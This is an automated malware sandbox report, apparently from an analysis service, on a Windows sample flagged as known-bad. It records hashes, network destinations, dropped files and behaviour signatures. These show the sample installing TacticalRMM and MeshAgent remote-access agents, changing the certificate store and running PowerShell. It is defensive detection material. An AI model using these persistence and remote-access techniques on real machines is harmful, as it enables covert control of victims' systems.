Analysis Overview
SHA256
e49f1144da14af1f79fccc8c9d310dc133b18cd543f1cbb669818f4872759680
Threat Level: Known bad
The file 2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch was found to be: Known bad.
Malicious Activity Summary
MeshAgent
Detects MeshAgent payload
Blocklisted process makes network request
Sets service image path in registry
Stops running service(s)
Executes dropped EXE
Checks installed software on the system
Drops file in System32 directory
Drops file in Program Files directory
Launches sc.exe
Unsigned PE
Command and Scripting Interpreter: PowerShell
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Runs ping.exe
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-06 13:44
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-06 13:44
Reported
2024-10-06 13:46
Platform
win7-20240903-en
Max time kernel
13s
Max time network
20s
Command Line
Signatures
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary blob value omitted) | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabFDA2.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarFDD4.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-06 13:44
Reported
2024-10-06 13:46
Platform
win10v2004-20240802-en
Max time kernel
93s
Max time network
149s
Command Line
Signatures
Detects MeshAgent payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MeshAgent
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" " | C:\Program Files\TacticalAgent\meshagent.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp | N/A |
| N/A | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| N/A | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| N/A | N/A | C:\Program Files\TacticalAgent\meshagent.exe | N/A |
| N/A | N/A | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| N/A | N/A | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| N/A | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| N/A | N/A | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| N/A | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| N/A | N/A | C:\ProgramData\chocolatey\choco.exe | N/A |
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\symbols\dll\dbghelp.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\iphlpapi.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\gdi32full.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\advapi32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\shell32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\comctl32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dbghelp.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\crypt32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\win32u.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CF78131CAB33CA407980412C760244BE717C6FAC | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\gdi32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\ntasn1.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\bcryptprimitives.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CF78131CAB33CA407980412C760244BE717C6FAC | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\apphelp.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\ucrtbase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ntdll.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\DLL\kernel32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ncrypt.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\ntasn1.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\kernel32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\gdiplus.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\gdi32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\msvcp_win.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\shell32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\rpcrt4.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\user32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\msvcrt.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\user32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CF78131CAB33CA407980412C760244BE717C6FAC | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\sechost.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\bcryptprimitives.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\crypt32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\gdi32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\C0BEA687D7F053491F9C106031255364DAE54685 | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ucrtbase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\msvcp_win.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\ntdll.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\ole32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ntasn1.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\crypt32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\DLL\dbgcore.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\DLL\iphlpapi.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\ws2_32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\ucrtbase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\gdi32full.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\msvcrt.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\23B56D70E6D09C712A2517A44EB94CA3FFE835CA | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ws2_32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\combase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\win32u.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\combase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\Kernel.Appcore.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\kernelbase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\msvcp_win.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\combase.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\apphelp.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\win32u.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\shell32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\MeshService64.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\System32\DLL\kernel32.pdb | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp\smi\mibs\SNMPv2-SMI.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pythonwin\pywin\idle\PyParse.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\setuptools\_distutils\archive_util.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32\test\test_win32print.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32com\server\exception.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\Cipher\Blowfish.pyi | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\cryptography-42.0.8.dist-info\RECORD | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\six.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\resolvelib\structs.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\ply-3.11.dist-info\RECORD | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp_pysmi-1.1.12.dist-info\entry_points.txt | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pythonwin\pywin\tools\browser.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\SelfTest\Cipher\test_Salsa20.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\Util\Counter.pyi | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_internal\pyproject.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pycryptodomex-3.20.0.dist-info\METADATA | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_internal\cli\command_context.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_internal\wheel_builder.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\rich\_extension.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pythonwin\pywin\idle\FormatParagraph.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\sniffio\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32com\demos\trybag.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\cryptography\hazmat\primitives\kdf\concatkdf.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_internal\metadata\importlib\_compat.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\rich\box.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\websockets\http.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Scripts\pip3.exe | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\Util\_raw_api.pyi | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\idna\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\rich\_emoji_codes.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\psutil\tests\test_windows.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp\proto\secmod\rfc3414\auth\base.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\PublicKey\_x25519.pyd | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\h11\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\truststore\py.typed | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pythonwin\pywin\debugger\dbgpyapp.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pywin32.pth | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\_asyncio.pyd | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\anyio-4.4.0.dist-info\RECORD | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_internal\metadata\importlib\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp\proto\secmod\rfc7860\auth\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pythonwin\pywin\mfc\window.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\setuptools\logging.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\sniffio-1.3.1.dist-info\INSTALLER | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\h11\py.typed | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\urllib3\fields.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp\proto\acmod\void.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\httpcore\__init__.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\chardet\charsetprober.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pysnmp\smi\mibs\PYSNMP-SOURCE-MIB.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\websockets\legacy\client.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32\Demos\win32clipboardDemo.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\api-ms-win-core-errorhandling-l1-1-0.dll | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\cryptography\hazmat\backends\openssl\aead.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\h11\_state.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32com\test\readme.txt | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\urllib3\http2.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\SelfTest\Hash\test_SHA3_384.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\pygments\formatters\pangomarkup.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\psutil-5.9.8.dist-info\INSTALLER | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pip\_vendor\urllib3\util\connection.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32com\test\pippo_server.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32ctypes\core\cffi\_dll.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| File created | C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\Cryptodome\Signature\eddsa.py | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
